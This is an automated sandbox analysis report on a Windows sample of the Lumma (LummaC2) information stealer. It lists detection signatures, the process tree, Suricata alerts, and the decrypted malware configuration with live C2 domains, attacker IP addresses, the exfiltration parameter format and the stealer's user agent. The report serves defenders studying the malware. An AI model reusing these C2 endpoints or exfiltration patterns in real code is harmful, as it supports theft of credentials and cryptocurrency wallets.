Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hpEAJnNwCB.exe

Overview

General Information

Sample name:hpEAJnNwCB.exe
renamed because original name is a hash value
Original sample name:07a0b87962fbee50d2adc913f06a3e3b.exe
Analysis ID:1576575
MD5:07a0b87962fbee50d2adc913f06a3e3b
SHA1:1d8772e4953a5644fed016c3603f7db6aeffaa2a
SHA256:85e572ae248f77ea01360746b27349c2baed236a9790e1c1ec7889d35ee1787f
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hpEAJnNwCB.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\hpEAJnNwCB.exe" MD5: 07A0B87962FBEE50D2ADC913F06A3E3B)
    • 91B1.tmp.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe" MD5: CC2566EAE03240FFC314E5BEE2DC4D26)
      • WerFault.exe (PID: 376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "diffuculttan.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x12a0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1130:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.91B1.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            3.2.91B1.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              3.3.91B1.tmp.exe.24e0000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                3.3.91B1.tmp.exe.24e0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:51.496307+010020283713Unknown Traffic192.168.2.104973645.77.249.79443TCP
                  2024-12-17T09:42:55.294008+010020283713Unknown Traffic192.168.2.1049748104.131.68.180443TCP
                  2024-12-17T09:42:58.661848+010020283713Unknown Traffic192.168.2.1049756104.121.10.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:52.466380+010020546531A Network Trojan was detected192.168.2.104973645.77.249.79443TCP
                  2024-12-17T09:42:55.716435+010020546531A Network Trojan was detected192.168.2.1049748104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:52.466380+010020498361A Network Trojan was detected192.168.2.104973645.77.249.79443TCP
                  2024-12-17T09:42:55.716435+010020498361A Network Trojan was detected192.168.2.1049748104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:55.294008+010020582151Domain Observed Used for C2 Detected192.168.2.1049748104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:51.496307+010020582231Domain Observed Used for C2 Detected192.168.2.104973645.77.249.79443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:56.659991+010020582101Domain Observed Used for C2 Detected192.168.2.10515251.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:52.600050+010020582141Domain Observed Used for C2 Detected192.168.2.10607061.1.1.153UDP
                  2024-12-17T09:42:53.587292+010020582141Domain Observed Used for C2 Detected192.168.2.10607061.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:56.205224+010020582161Domain Observed Used for C2 Detected192.168.2.10568911.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:55.979277+010020582181Domain Observed Used for C2 Detected192.168.2.10577741.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:55.722626+010020582201Domain Observed Used for C2 Detected192.168.2.10542621.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:48.126339+010020582221Domain Observed Used for C2 Detected192.168.2.10584461.1.1.153UDP
                  2024-12-17T09:42:49.117774+010020582221Domain Observed Used for C2 Detected192.168.2.10584461.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:47.903636+010020582261Domain Observed Used for C2 Detected192.168.2.10637421.1.1.153UDP
                  2024-12-17T09:42:56.983802+010020582261Domain Observed Used for C2 Detected192.168.2.10506951.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:56.428498+010020582361Domain Observed Used for C2 Detected192.168.2.10559671.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:42.435931+010028032742Potentially Bad Traffic192.168.2.1049709104.21.56.70443TCP
                  2024-12-17T09:42:44.008488+010028032742Potentially Bad Traffic192.168.2.1049715176.113.115.1980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:51.498310+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.1049736TCP
                  2024-12-17T09:42:55.296923+010028225211Domain Observed Used for C2 Detected104.131.68.180443192.168.2.1049748TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:42:59.448751+010028586661Domain Observed Used for C2 Detected192.168.2.1049756104.121.10.34443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://effecterectz.xyz/apimAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/0gAvira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE~Avira URL Cloud: Label: malware
                  Source: https://deafeninggeh.biz/apiVAvira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE6Avira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/PAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 3.2.91B1.tmp.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "diffuculttan.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "4h5VfH--"}
                  Multi AV Scanner detection for domain / URL
                  Source: https://effecterectz.xyz/apimVirustotal: Detection: 17%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: hpEAJnNwCB.exeVirustotal: Detection: 40%Perma Link
                  Source: hpEAJnNwCB.exeReversingLabs: Detection: 44%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: hpEAJnNwCB.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: effecterectz.xyz
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: immureprech.biz
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
                  Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeUnpacked PE file: 0.2.hpEAJnNwCB.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeUnpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack
                  Source: hpEAJnNwCB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.10:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.10:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49756 version: TLS 1.2
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C8C59 FindFirstFileExW,0_2_024C8C59
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00414624
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_024CC268
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB3FC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_024B63B6
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0249C030
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_024B70E4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_024CD0F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_024B60F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB08B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB0AF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB05B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_024BA637
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BC6C3
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB763
